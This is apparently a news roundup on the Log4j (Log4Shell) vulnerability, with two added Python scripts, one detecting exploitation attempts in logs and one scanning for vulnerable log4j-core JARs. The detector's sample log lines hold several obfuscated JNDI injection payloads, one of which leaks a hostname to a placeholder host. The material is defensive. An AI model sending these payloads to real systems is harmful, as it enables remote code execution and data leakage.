Log4j Updates: Flaw Challenges Global Security Leaders
ISMG Team's Latest News and Views of Critical Zero-Day and Its Impact
The security world continues its fight against potential widespread exploitation of the critical remote code execution vulnerability - tracked as CVE-2021-44228 - in Apache's Log4j software library, versions 2.0-beta9 to 2.14.1, known as "Log4Shell" and "Logjam."
As the U.S. Cybersecurity and Infrastructure Security Agency warns, Log4j is "very broadly used in a variety of consumer and enterprise services, websites, and applications - as well as in OT products - to log security and performance information." An unauthenticated remote actor, CISA warns, could exploit this vulnerability to take control of an affected system.
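To make the "unauthenticated remote actor" point concrete for defenders, here is an added example (not ISMG's, Apache's or any vendor's code) that flags Log4Shell exploitation attempts in web server logs, including the nested-lookup and URL-encoded obfuscations attackers use to hide the string jndi from naive pattern matching. The access-log lines are constructed, and the sentinel-based resolver is this example's own approximation of Log4j's innermost-first lookup expansion for the handful of lookups (lower, upper, date literals, default values) seen in obfuscated payloads.

```python
"""Flag Log4Shell (CVE-2021-44228) exploitation attempts in text logs, including the
obfuscated lookup forms attackers use to hide the string "jndi".

Added example; it is not ISMG's, Apache's or any vendor's code. The access-log lines in
SAMPLE_LOG are constructed for illustration and use documentation IP ranges."""
import re
from urllib.parse import unquote

# A ${...} lookup with nothing nested inside it; Log4j resolves innermost lookups first.
_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)


def _resolve(match):
    """Evaluate one innermost lookup the way Log4j's Interpolator would for the lookups
    attackers use as obfuscation; anything else is frozen with sentinel bytes."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    key = prefix.lower()
    if key == "lower" and sep:
        return rest.lower()                      # ${lower:J} -> j
    if key == "upper" and sep:
        return rest.upper()
    if key == "date" and sep and len(rest) >= 2 and rest[0] == rest[-1] == "'":
        return rest[1:-1]                        # ${date:'j'} -> j (SimpleDateFormat literal)
    if ":-" in body:
        return body.split(":-", 1)[1]            # ${::-j} and ${env:NaN:-j} -> default value j
    return "\x01" + body + "\x02"                # jndi, hostName, ...: leave in place


def normalize(text, max_rounds=20):
    """Undo URL-encoding and nested-lookup obfuscation. Returns the line with only the
    unresolved lookups (e.g. ${jndi:...}) still written as ${...}."""
    for _ in range(3):                           # tolerate double-encoded payloads
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        expanded = _INNERMOST.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text.replace("\x01", "${").replace("\x02", "}")


def analyse(line):
    """Classify one log line; 'scheme' is the JNDI protocol (ldap, rmi, dns, ...) if present."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    return {
        "raw": line,
        "normalized": norm,
        "jndi": m is not None,
        "scheme": m.group(1).lower() if m else None,
        "has_lookup": "${" in norm,
    }


def scan_lines(lines):
    """Return the analyses for every line that carries a Log4j lookup at all."""
    return [a for a in (analyse(l) for l in lines) if a["has_lookup"]]


# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [11/Dec/2021:02:10:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7/x}"',
    '198.51.100.7 - - [11/Dec/2021:02:10:41 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F198.51.100.7%2Fo%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '192.0.2.4 - - [11/Dec/2021:03:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}${::-n}${::-d}${::-i}:${::-d}ns://192.0.2.4/${hostName}}"',
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"{hit['scheme'] or 'lookup':6} {hit['normalized']}")
```

Two points from the output matter operationally: the dns scheme line carries `${hostName}` inside the lookup, which is the exfiltration pattern used to confirm which hosts are vulnerable before any LDAP payload is sent, and a line with a non-jndi lookup (has_lookup true, jndi false) is still worth a look because it shows someone probing for lookup evaluation.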
Here, you'll find Information Security Media Group's ongoing coverage around Log4j - including how to navigate the patch process and how attackers are beginning to exploit it.
Jan. 26, 2022
VMware released a patch to fix the Log4j remote code execution flaw present in its software last December and has issued guidance on mitigation. But in its new report, BlackBerry says its security research team has tracked cryptomining software and Cobalt Strike deployments on VMware Horizon servers. The latter tool is marketed as "software for adversary simulations and red team operations," but attackers regularly use cracked copies of the tool to build botnets. BlackBerry also says it has spotted tactics, techniques and procedures associated with the initial access broker Prophet Spider, which is known to sell network access to other criminals, including ransomware gangs.
Jan. 25, 2022
Microsoft researchers tracking Apache Log4j exploits last week discovered a previously undisclosed vulnerability in SolarWinds' Serv-U software, which the firm has since confirmed and patched.
Jan. 21, 2022
Exploitable vulnerabilities in the widely used Apache Log4j logging software have left security teams scrambling to identify where the software is used in their environment as well as how to guard against it being exploited.
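As an added example of the identification step (not ISMG's or Apache's tooling), the following Python script walks a directory tree for log4j-core copies, recurses into WAR/EAR/fat JARs, reads the Maven version from pom.properties and classifies each copy against the four CVEs disclosed in December 2021, treating the Java 7 (2.12.x) and Java 6 (2.3.x) backport branches separately. The fix-version table follows the Apache Log4j security advisories; the sample archives it builds are constructed for illustration and hold a placeholder instead of real bytecode.

```python
"""Locate Log4j 2 copies on disk, including JARs nested inside WAR/EAR/fat JARs, and
classify each by version against the four December 2021 CVEs.
Added example, not ISMG's or Apache's code. The version-to-fix mapping follows Apache's
Log4j security advisories; the archives from build_sample_jars() are constructed here."""
import io
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear", ".zip")
_PRE_RANK = {"alpha": -3, "beta": -2, "rc": -1}
FIRST_AFFECTED = (2, 0, 0, _PRE_RANK["beta"], 9)      # JNDI lookup arrived in 2.0-beta9
# First fixed version per CVE on the mainline (Java 8) branch and on the Java 7 (2.12.x)
# and Java 6 (2.3.x) backport branches, per the Apache advisories.
FIXES = {
    "CVE-2021-44228": {"main": (2, 15, 0), (2, 12): (2, 12, 2), (2, 3): (2, 3, 1)},
    "CVE-2021-45046": {"main": (2, 16, 0), (2, 12): (2, 12, 2), (2, 3): (2, 3, 1)},
    "CVE-2021-45105": {"main": (2, 17, 0), (2, 12): (2, 12, 3), (2, 3): (2, 3, 1)},
    "CVE-2021-44832": {"main": (2, 17, 1), (2, 12): (2, 12, 4), (2, 3): (2, 3, 2)},
}
JNDI_CVES = {"CVE-2021-44228", "CVE-2021-45046"}      # the two that deleting JndiLookup mitigates

def parse_version(text):
    """'2.14.1' -> (2,14,1,0,0); '2.0-beta9' -> (2,0,0,-2,9). Pre-releases sort below releases."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    major, minor, patch, pre, num = m.groups()
    return (int(major), int(minor), int(patch or 0), _PRE_RANK.get(pre, 0), int(num or 0))

def affected_cves(version):
    """CVEs a given log4j-core version is affected by, in disclosure order."""
    v = parse_version(version)
    if v[0] != 2 or v < FIRST_AFFECTED:
        return []                                      # 1.x (end of life) or pre-2.0-beta9
    branch = (v[0], v[1]) if (v[0], v[1]) in ((2, 12), (2, 3)) else "main"
    return [cve for cve, fixed in FIXES.items() if v[:3] < fixed[branch]]

def _inspect(zf, location, findings):
    names = set(zf.namelist())
    if POM_PROPS in names or JNDI_CLASS in names:
        version = "unknown"                            # shaded JARs may drop pom.properties
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        cves = affected_cves(version) if version != "unknown" else ["version unknown"]
        if JNDI_CLASS not in names:                    # class deleted as a mitigation
            cves = [c for c in cves if c not in JNDI_CVES] + ["JndiLookup.class removed"]
        findings.append({"path": location, "version": version, "cves": cves})
    for name in names:                                 # recurse into nested archives
        if name.lower().endswith(ARCHIVES):
            try:
                _inspect(zipfile.ZipFile(io.BytesIO(zf.read(name))), f"{location}!/{name}", findings)
            except zipfile.BadZipFile:
                continue

def scan_tree(root):
    """Walk a directory and return one finding per log4j-core copy found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVES):
                try:
                    with zipfile.ZipFile(os.path.join(dirpath, f)) as zf:
                        _inspect(zf, os.path.join(dirpath, f), findings)
                except zipfile.BadZipFile:
                    pass
    return findings

def _fake_log4j_core(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar (metadata only, no bytecode)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#constructed sample\nversion={version}\nartifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()

def build_sample_jars(root):
    """Constructed fixture: a vulnerable JAR, the same JAR with JndiLookup stripped,
    and a WAR bundling a fixed 2.17.1 under WEB-INF/lib."""
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.14.1"))
    with open(os.path.join(root, "log4j-core-2.14.1-nojndi.jar"), "wb") as f:
        f.write(_fake_log4j_core("2.14.1", with_jndi=False))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", _fake_log4j_core("2.17.1"))

def run_demo():
    """Build the fixture in a temp dir, scan it and return the findings sorted by path."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_jars(tmp)
        return sorted(scan_tree(tmp), key=lambda f: f["path"])

if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['version']:8} {', '.join(f['cves']) or 'not affected'}  {f['path']}")
```

Point it at application roots, extracted container image layers and vendor appliance firmware dumps. A copy whose pom.properties is missing (shaded builds) is reported as "version unknown" and needs manual inspection rather than being dismissed, and a JndiLookup-stripped JAR still shows the recursion DoS and the configuration-based RCE, which is why deletion is a stopgap and not a substitute for upgrading.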
Jan. 20, 2022
Although there have been no major compromises in the healthcare and public health sector to date involving Apache Log4j flaws, the health sector remains highly vulnerable, as do other industries, federal regulators warn.
Jan. 17, 2022
Ian Keller, security director at Ericsson, discusses a structured approach to mitigating the Log4j vulnerability. "I would advise security teams to use scanning tools native to their organization to identify the Log4j kind of vulnerabilities and zero-day gaps," he says.
Jan. 12, 2022
Night Sky ransomware appears to be new. It was first spotted by security research group MalwareHunterTeam, which on Jan. 1 reported finding a dedicated data leak site for attacks tied to that strain of ransomware. That means the attackers are practicing double extortion: they demand payment not just for a decryptor, but also to not release stolen data.
Jan. 10, 2022
Top U.S. cybersecurity leaders continue to warn against the perils of Apache Log4j vulnerabilities, confirming in a press conference that hundreds of millions of devices worldwide are likely affected by the logging utility flaw, although the response, in terms of scope and speed, has been "exceptional." Director of CISA, Jen Easterly, discusses incident reporting and SBOM legislation.
Jan. 7, 2022
U.S. Sen. Gary Peters, D-Mich., who chairs the Homeland Security and Governmental Affairs Committee, said this week that he convened a virtual briefing with both the U.S. Cybersecurity and Infrastructure Security Agency and National Cyber Director Chris Inglis to discuss the Biden administration's efforts to mitigate the threat posed by the Log4j vulnerability. Also: additional Log4j updates from CISA.
Jan. 6, 2022
The Apache Log4j vulnerability capped the end of a long year for CISOs and incident responders, and it left them with a mitigation project that carries them well into the New Year. CISOs John Bassett and Martin Dinel discuss how their teams have tackled Log4j - and significant lessons learned.
Jan. 5, 2022
The U.S. Federal Trade Commission, the nation's top consumer protection agency, issued notice that organizations failing to mitigate against Apache's Log4j vulnerabilities may face legal action.
Jan. 4, 2022
In an update to its Apache Log4j vulnerability guidance, Microsoft says exploitation attempts and testing for vulnerable systems and devices remained "high" through late December. This comes after security leaders have identified several sophisticated and even state-backed cyberattacks or attempts targeting vulnerable devices in recent weeks. Also, CISA continues to advocate for SBOM.
Dec. 30, 2021
As network defenders continue to patch or mitigate against the remote code execution vulnerability in the Java-based logging utility Log4j, several cybersecurity vendors have issued scanning and assessment tools to speed up the identification process. Also, in an event on Tuesday with ISMG's CyberEdBoard, a members-only community of security executives and thought leaders, Eric Goldstein, executive assistant director for cybersecurity at CISA, stressed the significance of Log4j.
Dec. 29, 2021
ONUS, one of Vietnam's largest cryptocurrency platforms, has reportedly fallen victim to a ransomware attack that has been traced to the Log4j remote code execution vulnerability in third-party payment software. CrowdStrike has also detected Chinese APT activity around the logging flaw.
Dec. 28, 2021
Another Log4j patch has been released by the Apache Software Foundation, the nonprofit that supports Apache's open-source software projects. Log4j version 2.17.1 fixes a newly disclosed remote code execution vulnerability tracked as CVE-2021-44832. It is the fifth flaw disclosed in under a month - four in Log4j and one in the "logback" framework. They are not all equally severe: the original Log4Shell flaw is triggered by nothing more than a logged string, whereas CVE-2021-44832 requires an attacker who can already modify the logging configuration. The Java-based logging utility is present, experts say, in millions of devices worldwide, or more.
Dec. 24, 2021
The latest edition of the ISMG Security Report features an analysis of the most recent developments in the Log4j security flaw crisis as well as incident response essentials for the ransomware era.
Dec. 22, 2021
CISA, the FBI, the NSA and several of their international law enforcement partners have issued a joint advisory on the known vulnerabilities in the Apache Log4j software library urging "any organization using products with Log4j to mitigate and patch immediately."
A week after announcing a new bug bounty program called "Hack DHS," intended to safeguard the federal agency's systems, U.S. Department of Homeland Security Secretary Alejandro Mayorkas announced that DHS is expanding the scope of the program to include finding and patching Log4j-related vulnerabilities in the systems.
Since mid-December, enterprises globally have been responding to the urgency of the Apache Log4j zero-day. John Ayers of Optiv discusses Optiv MXDR and how it helps customers detect, respond and gain the visibility needed to protect against potential exploits.
Dec. 21, 2021
Belgium's Ministry of Defense announced it had fallen victim to a cyberattack linked to the Log4j vulnerability tracked as CVE-2021-44228. The attack reportedly "paralyzed the ministry's activities for several days." Also, Cryptolaemus, a security research group, reported Log4j exploitation being used to deliver the Dridex banking malware and Meterpreter, the Metasploit pen-testing payload.
The Log4j vulnerability has underscored once again the widespread dependence on open-source software projects and the lurking risks. Patrick Dwyer of OWASP says such projects deserve more resources to avoid major security vulnerabilities.
Dec. 20, 2021
Ransomware-as-a-service continues to be a model cybercriminals are latching onto, with the top variants - LockBit, Conti, BlackMatter and Hive - accounting for the majority of attacks. Conti, in particular, is exploring ways to leverage the Log4j vulnerability in its attacks.
Dec. 18, 2021
A third patched version of Apache Log4j - 2.17.0 - fixes yet another vulnerability, a high-severity denial-of-service flaw tracked as CVE-2021-45105. The newly detected bug exists in 2.16.0 and earlier versions.
Cybersecurity firms, such as Blumira and Juniper Threat Labs, have uncovered multiple new attacks stemming from the Log4j vulnerability. Researchers say nation-state attackers are beginning to abuse and test the vulnerability while cybercriminals are targeting the flaw to drop malicious code, from ransomware to cryptomining software. Others are harvesting credentials to sell on the dark web.
Dec. 17, 2021
In an emergency directive issued on Friday regarding the explosive Apache Log4j vulnerabilities, CISA has required federal civilian departments and agencies to assess their internet-facing network assets and immediately patch the systems or implement appropriate mitigation measures.
Healthcare sector entities, like organizations across most industries, are being warned by authorities to carefully assess how the recently identified remote code execution vulnerability in the Apache Log4j Java logging library might affect their environments. What steps should they take?
In the latest weekly update, four editors at ISMG discuss important cybersecurity issues, including mitigating the Apache Log4j zero-day vulnerability, findings from a new report analyzing the Conti ransomware attack on Ireland's Health Services Executive and President Biden's drive to tighten export controls on certain offensive cyber tools.
The latest edition of the ISMG Security Report features an analysis of the Log4j security flaw, including the risks and mitigation techniques, how to patch Log4j, and CISO Dawn Cappelli on Log4j response.
Dec. 16, 2021
Cybersecurity experts are warning that a number of attackers tied to nation-states appear to be actively abusing or testing the Apache Log4j vulnerability. Criminal groups have also begun to target the flaw to drop malicious code, including crypto-locking malware, and well-known access brokers are using the flaw to gather enterprise access credentials for sale to other attackers, including ransomware groups, some experts warn.
Dec. 15, 2021
The question now facing already overworked teams - who are attempting to identify software and hardware that might have the flaw, test and deploy patches, and mitigate any attempts to exploit their systems before such fixes can be deployed - is: Which version of the patched software should they deploy - 2.15.0 or the newly released 2.16.0?
What's in store for defenders as attackers increasingly move to target the widespread Apache Log4j flaw present in many different types of software and hardware?
"Everyone is a target," says cybersecurity expert Etay Maor, whose team at Israeli secure access service edge company Cato Networks has been analyzing hundreds of attacks that attempt to exploit the Log4j vulnerability.
Dec. 14, 2021
Experts warn that mitigating the Log4j problem, which affects versions through 2.14.1, will be more akin to a marathon than a sprint. That's because Log4j is used by numerous vendors, and many have yet to identify all products at risk or develop and release patches. Once they do, enterprise IT and security teams will need to thoroughly test those patches to ensure they don't break existing setups, before rolling them out to production.
Like CISOs everywhere, Dawn Cappelli of Rockwell Automation awoke last Friday to news about the Log4j vulnerability and the risk it posed to her company, customers and partners. Here is how she approached triage, response and capturing insights to be shared with other security leaders.
Dec. 13, 2021
Multiple security researchers have now spotted several instances of threat actors exploiting the Apache Log4j vulnerability, either by deploying malware including the Muhstik and Mirai botnets or by scanning for vulnerable servers. Responders are advised to check for compromise before they implement fixes.
For many security teams, it's been all hands on deck since the Apache Log4j zero-day vulnerability recently came to light. Experts say the flaw may be the most serious security vulnerability to have emerged in years.
Dec. 11, 2021
Urgent application of a temporary fix is advised as advanced persistent threat-level actors and access brokers are now reported to be conducting mass scanning for the zero-day vulnerability detected in the Java logging library Apache Log4j, which can result in full server takeover and leaves countless applications vulnerable.
How serious is the Apache Log4j zero-day vulnerability that was announced to the world on Friday? "It's big," says Sam Curry, chief security officer at Cybereason, which has developed a 'vaccine' to help mitigate the vulnerability. "I hate hyperbole generally," Curry says. "But it is a 10 on the criticality scale."
Dec. 10, 2021
A zero-day vulnerability detected in the Java logging library Apache Log4j can result in full server takeover and leaves countless applications vulnerable, according to security researchers, who say that the easily exploitable flaw was first detected in the popular game Minecraft.